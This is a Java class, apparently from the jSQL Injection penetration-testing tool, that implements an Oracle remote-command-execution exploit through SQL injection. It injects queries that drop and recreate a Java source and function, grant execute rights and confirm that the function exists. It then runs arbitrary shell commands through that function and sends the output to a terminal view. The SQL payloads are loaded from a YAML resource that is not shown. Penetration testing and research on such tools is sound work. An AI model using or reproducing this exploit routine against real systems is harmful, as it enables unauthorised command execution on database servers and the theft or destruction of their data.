1 package com.jsql.model.accessible.vendor;
2
3 import com.jsql.model.InjectionModel;
4 import com.jsql.model.accessible.ExploitMode;
5 import com.jsql.model.accessible.ResourceAccess;
6 import com.jsql.model.accessible.vendor.oracle.ModelYamlOracle;
7 import com.jsql.model.bean.util.Interaction;
8 import com.jsql.model.bean.util.Request;
9 import com.jsql.model.exception.JSqlException;
10 import com.jsql.model.injection.vendor.model.VendorYaml;
11 import com.jsql.util.LogLevelUtil;
12 import org.apache.commons.lang3.StringUtils;
13 import org.apache.logging.log4j.LogManager;
14 import org.apache.logging.log4j.Logger;
15 import org.yaml.snakeyaml.Yaml;
16
17 import java.util.Arrays;
18 import java.util.UUID;
19
20 public class ExploitOracle {
21
22 private static final Logger LOGGER = LogManager.getRootLogger();
23 private final InjectionModel injectionModel;
24 private final ModelYamlOracle modelYaml;
25
26 private static final String RCE_JAVA_UTIL_SRC = "RCE_JAVA_UTIL_SRC";
27 private static final String RCE_JAVA_UTIL_FUNC = "RCE_JAVA_UTIL_FUNC";
28
29 public ExploitOracle(InjectionModel injectionModel) {
30 this.injectionModel = injectionModel;
31 var yaml = new Yaml();
32 this.modelYaml = yaml.loadAs(
33 injectionModel.getMediatorVendor().getOracle().instance().getModelYaml().getResource().getExploit(),
34 ModelYamlOracle.class
35 );
36 }
37
38 public void createRce(ExploitMode exploitMode) throws JSqlException {
39 if (!Arrays.asList(ExploitMode.AUTO, ExploitMode.QUERY_BODY).contains(exploitMode)) {
40 LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Exploit method not implemented, using query body instead");
41 }
42
43 this.injectionModel.injectWithoutIndex(String.format(
44 this.modelYaml.getUdf().getDropSource(),
45 ExploitOracle.RCE_JAVA_UTIL_SRC
46 ), "body#drop-src");
47 this.injectionModel.injectWithoutIndex(String.format(
48 this.modelYaml.getUdf().getDropFunc(),
49 ExploitOracle.RCE_JAVA_UTIL_FUNC
50 ), "body#drop-src");
51 this.injectionModel.injectWithoutIndex(String.format(
52 this.modelYaml.getUdf().getAddSource(),
53 ExploitOracle.RCE_JAVA_UTIL_SRC,
54 ExploitOracle.RCE_JAVA_UTIL_SRC
55 ), "body#add-src");
56 this.injectionModel.injectWithoutIndex(String.format(
57 this.modelYaml.getUdf().getAddFunc(),
58 ExploitOracle.RCE_JAVA_UTIL_FUNC,
59 ExploitOracle.RCE_JAVA_UTIL_SRC
60 ), ResourceAccess.ADD_FUNC);
61 this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getGrant(), "body#grant-exec");
62 var nameDatabase = this.injectionModel.getResourceAccess().getResult(String.format(
63 this.modelYaml.getUdf().getConfirm(),
64 VendorYaml.TRAIL_SQL,
65 ExploitOracle.RCE_JAVA_UTIL_FUNC
66 ), ResourceAccess.BODY_CONFIRM);
67 if (!nameDatabase.contains(ExploitOracle.RCE_JAVA_UTIL_FUNC)) {
68 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: java function not found");
69 return;
70 }
71 LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE successful: java function found");
72
73 var request = new Request();
74 request.setMessage(Interaction.ADD_TAB_EXPLOIT_UDF_ORACLE);
75 request.setParameters(null, null);
76 this.injectionModel.sendToViews(request);
77 }
78
79 public String runRceCmd(String command, UUID uuidShell) {
80 String result;
81 try {
82 result = this.injectionModel.getResourceAccess().getResult(String.format(
83 this.modelYaml.getUdf().getRunCmd(),
84 ExploitOracle.RCE_JAVA_UTIL_FUNC,
85 command.replace(StringUtils.SPACE, "%20"),
86 VendorYaml.TRAIL_SQL
87 ), ResourceAccess.UDF_RUN_CMD);
88 } catch (JSqlException e) {
89 result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
90 }
91 var request = new Request();
92 request.setMessage(Interaction.GET_TERMINAL_RESULT);
93 request.setParameters(uuidShell, result);
94 this.injectionModel.sendToViews(request);
95 return result;
96 }
97 }